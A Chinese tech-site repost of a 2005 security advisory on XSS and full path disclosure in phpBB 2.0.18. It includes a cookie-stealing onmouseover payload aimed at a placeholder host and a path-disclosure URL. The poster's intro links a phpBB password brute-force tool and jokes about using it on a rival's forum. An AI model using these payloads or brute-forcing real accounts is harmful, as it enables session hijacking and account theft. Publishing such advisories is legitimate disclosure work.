首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

phpBB论坛程序:老革命遇见新问题

作者:精神还没分裂2011 | 来源:互联网 | 2023-08-19 12:13
phpBB 2.0.18 XSS and Full Path Disclosure Details: SecurityAlert   还有一个是暴力破解的工具,
phpBB 2.0.18 XSS and Full Path Disclosure 
Details: SecurityAlert   
还有一个是暴力破解的工具,单线程的, 也没有大用处,实在情敌开了个什么phpbb什么的也可以拿来跑密码 
下载:http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar 
     Topic : phpBB 2.0.18 XSS and Full Path Disclosure 
    SecurityAlert Id : 269 
     SecurityRisk : Low 
     Remote Exploit : Yes 
     Local Exploit : No 
     Exploit Given : Yes 
     Credit : Maksymilian Arciemowicz 
     Date : 17.12.2005  
  Affected Software :  phpBB <= 2.0.18  
  Advisory Text : 
-----BEGIN PGP SIGNED MESSAGE----- 
Hash: SHA1 
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22] 
Author: Maksymilian Arciemowicz (cXIb8O3) 
Date: 16.12.2005 
from securityreason.com TEAM 
- --- 0.Description --- 
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar 
d package. phpBB has a user-friendly interface, simple and straightforward administration  
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL 
, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so 
lution for all web sites. 
Contact with author http://www.phpbb.com/about.php. 
- --- 1. XSS --- 
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al 
low HTML: YES" or are you Guest 
that you can use this tags: 
" Onmouseover="alert('SecurityReason.Com')" X=" H E L O  
Exploit: 
" Onmouseover="alert(document.location='http://HOST/COOKIEs?'+document.COOKIE) 
" X=" H A L O  
and have you COOKIEs. 
- --- 2. Full Path Disclosure --- 
In file admin/admin_disallow.php is 
- -25-31--- 
if( !empty($setmodules) ) 

$filename = basename(__FILE__); 
$module['Users']['Disallow'] = append_sid($filename); 
return; 

- -25-31--- 
function append_sid() dosen't exists. And if you have: 
register_globals = On 
display_errors = On 
Try to go: 
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1 
- -RESULT ERROR--- 
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa 
llow.php on line 28 
- -RESULT ERROR--- 
- --- 3. Greets --- 
sp3x 
- --- 4.Contact --- 
Author: Maksymilian Arciemowicz < cXIb8O3 > 
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com 
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg 
securityreason.com TEAM 
-----BEGIN PGP SIGNATURE----- 
Version: GnuPG v1.4.2 (FreeBSD) 
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D 
/0u14EN2sQAh1Bwu0yvT48Q= 
=lsL8 
-----END PGP SIGNATURE----- 
哦,对了, 最上面那个好象也许大概似乎我猜是这个意思: 
个性签名: 
您填写的个性签名自动附带在您的发表的文章底部。个性签名有512个字符的限制。 
禁止HTML标签 
允许风格标签 
允许表情图标 
找到可以“允许HTML标签” 


推荐阅读
  • ip

    cisco路由器IOS恢复方法之ROMMON恢复的步骤详解

    本文详细介绍了cisco路由器IOS损坏时的恢复方法,包括进入ROMMON模式、设置IP地址、子网掩码、默认网关以及使用TFTP服务器传输IOS文件的步骤。 ... [详细]
  • js

    知识图谱——机器大脑中的知识库

    知识图谱——机器大脑中的知识库
    本文介绍了知识图谱在机器大脑中的应用,以及搜索引擎在知识图谱方面的发展。以谷歌知识图谱为例,说明了知识图谱的智能化特点。通过搜索引擎用户可以获取更加智能化的答案,如搜索关键词"Marie Curie",会得到居里夫人的详细信息以及与之相关的历史人物。知识图谱的出现引起了搜索引擎行业的变革,不仅美国的微软必应,中国的百度、搜狗等搜索引擎公司也纷纷推出了自己的知识图谱。 ... [详细]
  • list

    微软头条实习生分享深度学习自学指南

    微软头条实习生分享深度学习自学指南
    本文介绍了一位微软头条实习生自学深度学习的经验分享,包括学习资源推荐、重要基础知识的学习要点等。作者强调了学好Python和数学基础的重要性,并提供了一些建议。 ... [详细]
  • list

    2018年人工智能大数据的爆发,学Java还是Python?

    2018年人工智能大数据的爆发,学Java还是Python?
    本文介绍了2018年人工智能大数据的爆发以及学习Java和Python的相关知识。在人工智能和大数据时代,Java和Python这两门编程语言都很优秀且火爆。选择学习哪门语言要根据个人兴趣爱好来决定。Python是一门拥有简洁语法的高级编程语言,容易上手。其特色之一是强制使用空白符作为语句缩进,使得新手可以快速上手。目前,Python在人工智能领域有着广泛的应用。如果对Java、Python或大数据感兴趣,欢迎加入qq群458345782。 ... [详细]
  • js

    vue使用

    vue使用
    关键词: ... [详细]
  • js

    Monkey《大话移动——Android与iOS应用测试指南》的预购信息发布啦!

    Monkey《大话移动——Android与iOS应用测试指南》的预购信息发布啦!
    Monkey《大话移动——Android与iOS应用测试指南》的预购信息已经发布,可以在京东和当当网进行预购。感谢几位大牛给出的书评,并呼吁大家的支持。明天京东的链接也将发布。 ... [详细]
  • ip

    CSS3选择器的使用方法详解,提高Web开发效率和精准度

    CSS3选择器的使用方法详解,提高Web开发效率和精准度
    本文详细介绍了CSS3新增的选择器方法,包括属性选择器的使用。通过CSS3选择器,可以提高Web开发的效率和精准度,使得查找元素更加方便和快捷。同时,本文还对属性选择器的各种用法进行了详细解释,并给出了相应的代码示例。通过学习本文,读者可以更好地掌握CSS3选择器的使用方法,提升自己的Web开发能力。 ... [详细]
  • js

    求解hdu 1003 java题目的动态规划优化方法

    本文讨论了如何优化解决hdu 1003 java题目的动态规划方法,通过分析加法规则和最大和的性质,提出了一种优化的思路。具体方法是,当从1加到n为负时,即sum(1,n)sum(n,s),可以继续加法计算。同时,还考虑了两种特殊情况:都是负数的情况和有0的情况。最后,通过使用Scanner类来获取输入数据。 ... [详细]
  • js

    Mac OS 升级到11.2.2 Eclipse打不开了,报错Failed to create the Java Virtual Machine

    Mac OS 升级到11.2.2 Eclipse打不开了,报错Failed to create the Java Virtual Machine
    本文介绍了在Mac OS升级到11.2.2版本后,使用Eclipse打开时出现报错Failed to create the Java Virtual Machine的问题,并提供了解决方法。 ... [详细]
  • ip

    Voicewo在线语音识别转换jQuery插件的特点和示例

    Voicewo在线语音识别转换jQuery插件的特点和示例
    本文介绍了一款名为Voicewo的在线语音识别转换jQuery插件,该插件具有快速、架构、风格、扩展和兼容等特点,适合在互联网应用中使用。同时还提供了一个快速示例供开发人员参考。 ... [详细]
  • js

    java 线程死锁模拟

    1,关于死锁的理解死锁,我们可以简单的理解为是两个线程同时使用同一资源,两个线程又得不到相应的资源而造成永无相互等待的情况。 2,模拟死锁背景介绍:我们创建一个朋友 ... [详细]
  • import

    sklearn数据集库中的常用数据集类型介绍

    sklearn数据集库中的常用数据集类型介绍
    本文介绍了sklearn数据集库中常用的数据集类型,包括玩具数据集和样本生成器。其中详细介绍了波士顿房价数据集,包含了波士顿506处房屋的13种不同特征以及房屋价格,适用于回归任务。 ... [详细]
  • regex

    Python正则表达式学习记录及常用方法

    Python正则表达式学习记录及常用方法
    本文记录了学习Python正则表达式的过程,介绍了re模块的常用方法re.search,并解释了rawstring的作用。正则表达式是一种方便检查字符串匹配模式的工具,通过本文的学习可以掌握Python中使用正则表达式的基本方法。 ... [详细]
  • ip

    centos查看系统版本,linux安装centos

    三、查看Linux版本查看系统版本信息的命令:lsb_release-a[root@localhost~]#lsb_release-aLSBVersion::co ... [详细]
  • regex

    reg封装

    ***Createdbyjiachenpanon161118.**合法uri*exportfunctionvalidateURL(textval){consturlregex^( ... [详细]
author-avatar
精神还没分裂2011
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有